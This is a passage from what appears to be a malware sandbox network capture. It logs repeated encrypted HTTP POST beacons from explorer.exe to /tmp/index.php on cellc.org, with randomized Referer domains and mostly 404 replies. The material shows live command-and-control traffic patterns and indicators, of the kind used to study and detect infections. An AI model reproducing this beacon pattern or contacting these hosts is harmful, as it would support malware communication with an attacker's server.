| 1 | 192.168.2.4 | 49745 | 186.10.34.243 | 80 | 2580 | C:\Windows\explorer.exe |

May 2, 2024 20:49:26.484536886 CEST, 280 bytes transferred, OUT:
POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://khjhprifrxebx.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 113
Host: cellc.org

May 2, 2024 20:49:26.484560013 CEST, 113 bytes transferred, OUT:
Data Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 39 34 aa f8
Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA -[k,vu94LMzL[kU2u'

May 2, 2024 20:49:27.180330038 CEST, 510 bytes transferred, IN:
HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Thu, 02 May 2024 18:49:26 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/7.4.33
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 2
Source IP: 192.168.2.4
Source Port: 49746
Destination IP: 186.10.34.243
Destination Port: 80
PID: 2580
Process: C:\Windows\explorer.exe

Timestamp, bytes transferred, direction, data:
[May 2, 2024 20:49:27.548347950 CEST] 281 bytes OUT: POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://yyyjoidqibgvbs.net/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 254
    Host: cellc.org
[May 2, 2024 20:49:27.548413992 CEST] 254 bytes OUT: Data Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 7d 2c a2 92
    Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA -[k,vu},W\aP9i =kwH[3x#B3~?7Un6AeF/}F$vy'<UMb {Yz.(g<|IcZ<A
[May 2, 2024 20:49:28.469897985 CEST] 510 bytes IN: HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Thu, 02 May 2024 18:49:28 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    X-Powered-By: PHP/7.4.33
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 3
Source IP: 192.168.2.4
Source Port: 49747
Destination IP: 186.10.34.243
Destination Port: 80
PID: 2580
Process: C:\Windows\explorer.exe

Timestamp, bytes transferred, direction, data:
[May 2, 2024 20:49:29.611454010 CEST] 282 bytes OUT: POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://jyvmasmiydvgjuu.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 117
    Host: cellc.org
[May 2, 2024 20:49:29.611469030 CEST] 117 bytes OUT: Data Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 2d 52 d6 8c
    Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA -[k,vu-RA]Xbb{0Qu{7q
[May 2, 2024 20:49:30.304878950 CEST] 163 bytes IN: HTTP/1.1 200 OK
    Server: nginx/1.26.0
    Date: Thu, 02 May 2024 18:49:30 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    X-Powered-By: PHP/7.4.33


Session ID: 4
Source IP: 192.168.2.4
Source Port: 49748
Destination IP: 186.10.34.243
Destination Port: 80
PID: 2580
Process: C:\Windows\explorer.exe

Timestamp, bytes transferred, direction, data:
[May 2, 2024 20:49:30.529067993 CEST] 279 bytes OUT: POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://qkoxdyhgicus.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 176
    Host: cellc.org
[May 2, 2024 20:49:30.529092073 CEST] 176 bytes OUT: Data Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 2e 1f d5 ed
    Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA -[k,vu.!Y[Ns)EGd|ik2&\AO'#%!t?="O/]OH
[May 2, 2024 20:49:31.224658966 CEST] 510 bytes IN: HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Thu, 02 May 2024 18:49:30 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    X-Powered-By: PHP/7.4.33
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 5
Source IP: 192.168.2.4
Source Port: 49749
Destination IP: 186.10.34.243
Destination Port: 80
PID: 2580
Process: C:\Windows\explorer.exe

Timestamp, bytes transferred, direction, data:
[May 2, 2024 20:49:31.455151081 CEST] 278 bytes OUT: POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://wsacracxaao.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 235
    Host: cellc.org
[May 2, 2024 20:49:31.455168009 CEST] 235 bytes OUT: Data Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 5c 2b ce b9
    Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA -[k,vu\+hWLa\R%--ybA`v6@J[&F;NK1 2)o$SgX G:Y[?w6s~(@dbtyN
[May 2, 2024 20:49:32.375453949 CEST] 510 bytes IN: HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Thu, 02 May 2024 18:49:32 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    X-Powered-By: PHP/7.4.33
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 6
Source IP: 192.168.2.4
Source Port: 49750
Destination IP: 186.10.34.243
Destination Port: 80
PID: 2580
Process: C:\Windows\explorer.exe

Timestamp, bytes transferred, direction, data:
[May 2, 2024 20:49:33.652087927 CEST] 278 bytes OUT: POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://dhdnvpjjjnb.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 125
    Host: cellc.org
[May 2, 2024 20:49:33.652129889 CEST] 125 bytes OUT: Data Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 55 5d c7 9b
    Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA -[k,vuU]0@Xk,z\\JnM03
[May 2, 2024 20:49:34.573210001 CEST] 510 bytes IN: HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Thu, 02 May 2024 18:49:34 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    X-Powered-By: PHP/7.4.33
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49751 | 186.10.34.243 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 20:49:34.799211979 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hberlqlxvspxm.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 314
Host: cellc.org
May 2, 2024 20:49:34.799297094 CEST | 314 | OUT | Data Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 2d 49 a2 b8
Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA -[k,vu-IMSJ|a]Otca_KEryS9UGtG-!L]U,)q0&IgNkOfU+a?,G1wc0
May 2, 2024 20:49:35.490858078 CEST | 510 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Thu, 02 May 2024 18:49:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/7.4.33
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49752 | 186.10.34.243 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 20:49:35.713702917 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ndsmsdugaunva.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 260
Host: cellc.org
May 2, 2024 20:49:35.713702917 CEST | 260 | OUT | Data Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 35 0d b9 bc
Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA -[k,vu5a]eqDdUK Q]5;o1K,)-z<#b9C]"YP=NuE.uHI_|yJjMSV9zD,PKd
May 2, 2024 20:49:36.407660007 CEST | 510 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Thu, 02 May 2024 18:49:36 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/7.4.33
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49753 | 186.10.34.243 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 20:49:37.305665970 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://kxgtxppvhlmsi.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 311
Host: cellc.org
May 2, 2024 20:49:37.305697918 CEST | 311 | OUT | Data Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 2d 42 a8 90
Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA -[k,vu-BNElU3-vjK!_,o""/P|x{+3l&rL%zeAN,kclpLjTpD%q[`
May 2, 2024 20:49:38.000391006 CEST | 510 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Thu, 02 May 2024 18:49:37 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/7.4.33
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49754 | 186.10.34.243 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 20:49:38.222923994 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dgqkmisxnbbni.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 138
Host: cellc.org
May 2, 2024 20:49:38.222948074 CEST | 138 | OUT | Data Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 65 20 e4 94
Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA -[k,vue s_W~5iv%5:4H\f{F-
May 2, 2024 20:49:38.914377928 CEST | 510 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
